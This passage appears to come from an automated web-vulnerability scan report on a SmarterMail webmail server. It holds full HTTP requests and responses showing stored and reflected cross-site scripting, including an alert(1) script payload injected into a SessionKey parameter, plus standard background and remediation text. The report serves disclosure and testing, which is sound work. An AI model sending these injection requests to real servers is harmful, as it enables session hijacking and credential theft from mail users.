0%3A0%3A0%22%7D&ctl00_MPH_condition_timeofday_timeView_ClientState=&ctl00_MPH_condition_timeofday_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1900+0%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2100+0%3A0%3A0%22%7D&ctl00%24MPH%24condition2_timeofday=2010-10-02-17-00-00&ctl00_MPH_condition2_timeofday_dateInput_text=5%3A00+PM&ctl00%24MPH%24condition2_timeofday%24dateInput=2010-10-02-17-00-00&ctl00_MPH_condition2_timeofday_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1900+0%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2100+0%3A0%3A0%22%7D&ctl00_MPH_condition2_timeofday_timeView_ClientState=&ctl00_MPH_condition2_timeofday_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1900+0%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2100+0%3A0%3A0%22%7D&ctl00%24MPH%24enabled_subject=on&ctl00%24MPH%24conditiontype_subject=Equals&ctl00%24MPH%24condition_subject=baseline-subject&ctl00%24MPH%24condition2_subject=&ctl00%24MPH%24enabled_location=on&ctl00%24MPH%24conditiontype_location=Equals&ctl00%24MPH%24condition_location=baseline-location&ctl00%24MPH%24condition2_location=&ctl00%24MPH%24enabled_description=on&ctl00%24MPH%24conditiontype_description=Equals&ctl00%24MPH%24condition_description=baseline-description&ctl00%24MPH%24condition2_description=&ctl00_MPH_HyperGrid1_HiddenInput=&ctl00_MPH_HyperGrid1_HiddenLSR=

Request 2

GET /Main/Alerts/frmAlerts.aspx?level=user&bycat=@Collaboration HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STTTState={"EventMyEventsByEventGroup":"true","EventMyEventsByCategory":"true"}; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserEvents"}

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 16:06:42 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 16162



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Events - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
   <form method="post" action="frmAlerts.aspx?level=user&amp;bycat=%40Collaboration" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTA2NDU1NzcwNw8WCB4IX19fVGl0bGUFBkV2ZW50cx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgoCAw9kFgQCAQ9kFgICAQ8PFgIeC05hdmlnYXRlVVJMBRhmcm1BbGVydC5hc3B4P2xldmVsPXVzZXJkZAIDD2QWAgIBD2QWAgIBDw8WAh4EVGV4dAUJU2VhcmNoLi4uZGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwdoZAIHD2QWAmYPZBYCAgEPFgIfB2gWAgIBDxYCHwVlZAIIDxYCHwdoZBgCBRdjdGwwMCROYXZQSCRIeXBlclBhZ2VyMQ8FH2N0bDAwX01QSF9IeXBlckdyaWQxfDF8MHw5fDUwfDBkBRRjdGwwMCRNUEgkSHlwZXJHcmlkMQ8FLFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXxOYW1lIGFzY3xGYWxzZXxGYWxzZXwwZJfPoXRhDVMq5J9Pbo3GGhk+YvAx" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = false;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1','tctl00$NavPH$UpdatePanel2'], ['ctl00$BPH$btnDelete','ctl00$BrPH$SearchBar$btnClear','ctl00$BrPH$SearchBar$btnGo'], [], 90);
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Events
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnAdd" class="BBButton"><a class="ButtonBarAnchor" href="frmAlert%2easpx%3flevel%3duser" onclick="window.location.href = 'frmAlert\x2easpx\x3flevel\x3duser'; return false;" tabindex='0'><span class="BBInner">New</span></a></div>
   <div id="ctl00_BPH_btnEdit" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEdit(); return false;"><span class="BBInner">Edit</span></a></div>
   <div id="ctl00_BPH_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
   
<div id="FilterBarContents" class="RoundedSearchBox">
   <div class="RoundedSearchBoxLeft">
       <div class="RoundedSearchBoxRight">
           <label for="ctl00_BrPH_SearchBar_FilterBox" id="ctl00_BrPH_SearchBar_FilterBoxLabel" style="display: none">Search...</label>
           <div id="ctl00_BrPH_SearchBar_btnGo" class="BBButton GoButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$SearchBar$btnGo',''); return false;"><span class="BBInner"></span></a></div>
           <input name="ctl00$BrPH$SearchBar$FilterBox" type="text" value="1" id="ctl00_BrPH_SearchBar_FilterBox" autocomplete="off" />
           <div id="ctl00_BrPH_SearchBar_btnClear" class="BBButton ClearButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$SearchBar$btnClear',''); return false;"><span class="BBInner"></span></a></div>
       </div>
   </div>
</div>


   <script type="text/javascript">
var startup = function() {
$("#FilterBarContents").magicLabels();

$("#ctl00_BrPH_SearchBar_FilterBox").keypress(function(event) {
if (event.keyCode == 13) {
__doPostBack('ctl00$BrPH$SearchBar$btnGo','');
event.preventDefault();
}
});

$("#ctl00_BrPH_SearchBar_btnClear").click(function() {
$("#ctl00_BrPH_SearchBar_FilterBox").val('');
$("#FilterBarContents").magicLabels();
});
}
setTimeout(startup, 1);
   </script>




           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
   <li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
   <li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
   <div id="ctl00_MPH_UpdatePanel1">
   
           
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=Name desc')">Name<img src='/App_Themes/Default/Images/Misc/up.gif' /></a></th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=EventCategory asc')">Event Category</a></th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=EventType asc')">Event Type</a></th><th scope="col" class="leftpad" style="overflow: hidden">Conditions</th><th scope="col" class="rc leftpad" style="overflow: hidden">Actions</th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTQyZWQ0ZGFmMGZjNDg4YzkxYTY3MWQ5NThjOTBmZTQ-" name="ctl00_MPH_HyperGrid1_CB64_MTQyZWQ0ZGFmMGZjNDg4YzkxYTY3MWQ5NThjOTBmZTQ-" /></td><td>1c981<a>d1ed183a8f7</td><td class="leftpad">Collaboration</td><td class="leftpad">Calendar Reminder Occured</td><td class="leftpad">Time of Day, Subject, Location, Description, Domain, Email Address</td><td class="rc leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU5NGU5OGUzOTRkNDY4ODkzZDNjOWM3OTJjNjNjZDY-" name="ctl00_MPH_HyperGrid1_CB64_MmU5NGU5OGUzOTRkNDY4ODkzZDNjOWM3OTJjNjNjZDY-" /></td><td>3bf4b<script>alert(1)</script>db961c96c95</td><td class="leftpad">Collaboration</td><td class="leftpad">Calendar Reminder Occured</td><td class="leftpad">Time of Day, Subject, Location, Description, Domain, Email Address</td><td class="rc leftpad">-</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MGQzY2U5MGFhMDA4NGVhYjhmYWVlM2IyMzY1MzJkNDc-" name="ctl00_MPH_HyperGrid1_CB64_MGQzY2U5MGFhMDA4NGVhYjhmYWVlM2IyMzY1MzJkNDc-" /></td><td>4d7bf<a>ea78214aab8</td><td class="leftpad">Collaboration</td><td class="leftpad">Calendar Reminder Occured</td><td class="leftpad">Time of Day, Subject, Location, Description, Domain, Email Address</td><td class="rc leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzYwMDNhMzRjODQ2NGMwZGJkYzUxYjhkZTIwZjNlMTc-" name="ctl00_MPH_HyperGrid1_CB64_YzYwMDNhMzRjODQ2NGMwZGJkYzUxYjhkZTIwZjNlMTc-" /></td><td>70acfb304d85e3d5333cc91d</td><td class="leftpad">Collaboration</td><td class="leftpad">Calendar Reminder Occured</td><td class="leftpad">Time of Day, Subject, Location, Description, Domain, Email Address</td><td class="rc leftpad">-</td></tr>
<tr class="lastrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YTQ5YTcwODgwMWExNDUyYjhmNGRiZDFjOTA5ZjlkY2U-" name="ctl00_MPH_HyperGrid1_CB64_YTQ5YTcwODgwMWExNDUyYjhmNGRiZDFjOTA5ZjlkY2U-" /></td><td>fd2e4<script>alert(1)</script>c47eb76e20e</td><td class="leftpad">Collaboration</td><td class="leftpad">Calendar Reminder Occured</td><td class="leftpad">Time of Day, Subject, Location, Description, Domain, Email Address</td><td class="rc leftpad">-</td></tr>
</tbody>
</table>
<input type="hidden" name="ctl00_MPH_HyperGrid1_HiddenInput" id="ctl00_MPH_HyperGrid1_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_HyperGrid1_HiddenLSR" id="ctl00_MPH_HyperGrid1_HiddenLSR" value="" />
</div>
</div>

       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   <div id="ctl00_NavPH_UpdatePanel2">
   
           
<span class="HyperPagerWrapper" id="ctl00_NavPH_HyperPager1">
<span class="HyperPager">
<span class="pagerarrow"><img src='/App_Themes/Default/Images/Pager/endArrow_L_disabled.gif' align='absmiddle' /></span>
<span class="pagerarrow"><img src='/App_Themes/Default/Images/Pager/doubleArrow_L_disabled.gif' align='absmiddle' /></span>
<span class="pagerarrow"><img src='/App_Themes/Default/Images/Pager/singleArrow_L_disabled.gif' align='absmiddle' /></span>
<span class="hpPageCurrent">1</span>
<span class="hpPage">of 1</span>
<span class="pagerarrow"><img src='/App_Themes/Default/Images/Pager/singleArrow_R_disabled.gif' align='absmiddle' /></span>
<span class="pagerarrow"><img src='/App_Themes/Default/Images/Pager/doubleArrow_R_disabled.gif' align='absmiddle' /></span>
<span class="pagerarrow"><img src='/App_Themes/Default/Images/Pager/endArrow_R_disabled.gif' align='absmiddle' /></span>
</span>
</span>

   
       
</div>

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('main/alerts/frmalerts', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[

function ShowContextMenu_ctl00_MPH_ctl01(evt) {
   $('#ctl00_MPH_ctl01').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2fAlerts\x2ffrmAlerts\x2easpx?level\x3duser\x26bycat\x3d\x2540Collaboration'); });
var ctl00_MPH_HyperGrid1_Url11187 = new Array();
ctl00_MPH_HyperGrid1_Url11187[0] = 'frmAlert\x2easpx\x3fedit\x3d142ed4daf0fc488c91a671d958c90fe4\x26level\x3duser\x26bycat\x3d\x40Collaboration';
ctl00_MPH_HyperGrid1_Url11187[1] = 'frmAlert\x2easpx\x3fedit\x3d2e94e98e394d468893d3c9c792c63cd6\x26level\x3duser\x26bycat\x3d\x40Collaboration';
ctl00_MPH_HyperGrid1_Url11187[2] = 'frmAlert\x2easpx\x3fedit\x3d0d3ce90aa0084eab8faee3b236532d47\x26level\x3duser\x26bycat\x3d\x40Collaboration';
ctl00_MPH_HyperGrid1_Url11187[3] = 'frmAlert\x2easpx\x3fedit\x3dc6003a34c8464c0dbdc51b8de20f3e17\x26level\x3duser\x26bycat\x3d\x40Collaboration';
ctl00_MPH_HyperGrid1_Url11187[4] = 'frmAlert\x2easpx\x3fedit\x3da49a708801a1452b8f4dbd1c909f9dce\x26level\x3duser\x26bycat\x3d\x40Collaboration';
var ctl00_MPH_HyperGrid1;
function DelayedSetupctl00_MPH_HyperGrid1() {
   ctl00_MPH_HyperGrid1 = new HyperGrid('ctl00_MPH_HyperGrid1', true, '', 'Url11187', '', null, 0, ShowContextMenu_ctl00_MPH_ctl01, null, DoDeleteQuery_ctl00_BPH_btnDelete, false, 2, '\x7b0\x7d\x20selected\x20items',false, '', {});
   ctl00_MPH_HyperGrid1.AddUrlColumn('Url11187',ctl00_MPH_HyperGrid1_Url11187);
   ctl00_MPH_HyperGrid1.AutoSelect();
   ctl00_MPH_HyperGrid1.Focus();
}
if (self.ctl00_MPH_HyperGrid1HGIsCallback)
   DelayedSetupctl00_MPH_HyperGrid1();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_HyperGrid1, 100);});
self.ctl00_MPH_HyperGrid1HGIsCallback = true;
Sys.Application.initialize();
$(function() { SetTopTitle('Events\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
function DoEdit_ctl00_BPH_btnEdit() {
   if(self.ctl00_MPH_HyperGrid1 == null || !self.ctl00_MPH_HyperGrid1.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_HyperGrid1.GetUrlForSelectedRow == null) return;
   var url = ctl00_MPH_HyperGrid1.GetUrlForSelectedRow();
   if (url != null) { location.href = url; }
   else {
       if (ctl00_MPH_HyperGrid1.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You can not edit multiple items at once.');
   }
}
function DoDeleteQuery_ctl00_BPH_btnDelete() {
   if (!self.ctl00_MPH_HyperGrid1) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_HyperGrid1.GetSelectedRowCount ? ctl00_MPH_HyperGrid1.GetSelectedRowCount() : ctl00_MPH_HyperGrid1.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_btnDelete);
}
function DoDelete_ctl00_BPH_btnDelete() { __doPostBack('ctl00$BPH$btnDelete',''); }
$(function() { $('#ctl00_MPH_ctl01').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl01_hm0":"DoEdit_ctl00_BPH_btnEdit();","ctl00_MPH_ctl01_hm1":"DoDeleteQuery_ctl00_BPH_btnDelete();"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


2. Cross-site scripting (reflected)  previous  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://vulnerable.smartermail.site:9998/Default.aspx [ctl00%24Split%24LP%24SessionKey parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Default.aspx

Issue detail

The value of the ctl00%24Split%24LP%24SessionKey request parameter is copied into the HTML document as plain text between tags. The payload 15544<script>alert(1)</script>17bad02815c was submitted in the ctl00%24Split%24LP%24SessionKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Default.aspx HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Origin: http://vulnerable.smartermail.site:9998
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserContacts"}
Content-Length: 1196

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceSelf_CB=on&ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCategoryAllCategories_CB=on&ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortAsc_CB=on&ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDisplayName_CB=on&ctl00%24Split%24LP%24ctl01%24searchBarContacts%24FilterBox=Search...&ctl00%24Split%24LP%24ctl01%24grdContactsSelectedIDs=&ctl00%24Split%24LP%24ctl01%24grdContactsScrollPos=&ctl00%24Split%24LP%24SessionKey=5986f17e17ac4101ad20a3ebc87e429815544<script>alert(1)</script>17bad02815c&ctl00%24PageTitle=Contacts%20-%20hoytllc.com%20-%20SmarterMail&ctl00%24PanelLoadedState=%7B%7D&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate&__EVENTARGUMENT=UserContacts%7C%2FMain%2FfrmEmptyPreviewOuter.aspx%3Ftype%3Dcontacts&__VIEWSTATE=%2FwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBSBjdGwwMCRTcGxpdCRMUCRjdGwwMSRncmRDb250YWN0cw8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGT8XpaY8h6fxawd0JLTm1yS3kkTOg%3D%3D&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 16:20:12 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 24221

13919|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
                   
<div style="display: none">
   <div id="ctl00_Split_LP_ctl01_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_Split_LP_ctl01_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           
<!-- HyperMenu -->
<div class='hmNavMenu'><ul class='hmMenu hmNavMenu hmList' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle' name='ctl00$Split$LP$ctl01$menuContactsSourceTitle' style='z-index:1002'>
   <li class='hmItem hmFirst hmLast' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource' style='z-index: 1002'><a class='hmA hmHasChildren' href='#'>My Contacts<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceSelf' style='z-index: 1002'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceSelf_CB' group='source' type='checkbox'checked='checked'></div>My Contacts</a></li>
       <li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuaSourceGlobalAddressList' style='z-index: 1002'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuaSourceGlobalAddressList_CB' group='source' type='checkbox'></div>Global Address List</a></li>
       <li class='hmSeperator' style='z-index:1002'><span><!-- --></span></li>
       <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceManage' style='z-index: 1002'><a class='hmA' href='#'>Mapped Resources</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>

       </div>
   </div>
</div>
<div id="ButtonBar" class="ButtonBar">
   
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuContacts' name='ctl00$Split$LP$ctl01$menuContacts' style='z-index:1001'>
   <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>New<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_8e0bbef791a74eb3a81a9baf46d77453' style='z-index: 1001'><a class='hmA' href='#'>New Message</a></li>
       <li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_8a0ba520215e4dd8a08f1e0331c3eedc' style='z-index: 1001'><a class='hmA' href='#'>New Contact</a></li>
       <li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_f2e8f1304ff848b3b9f2b74409fcab56' style='z-index: 1001'><a class='hmA' href='#'>New Appointment</a></li>
       <li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_094cfc874ad0439692e5c676fc29554f' style='z-index: 1001'><a class='hmA' href='#'>New Task</a></li>
       <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_74c667b2c32742c794ac67a6a4a1ed68' style='z-index: 1001'><a class='hmA' href='#'>New Note</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
   <li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
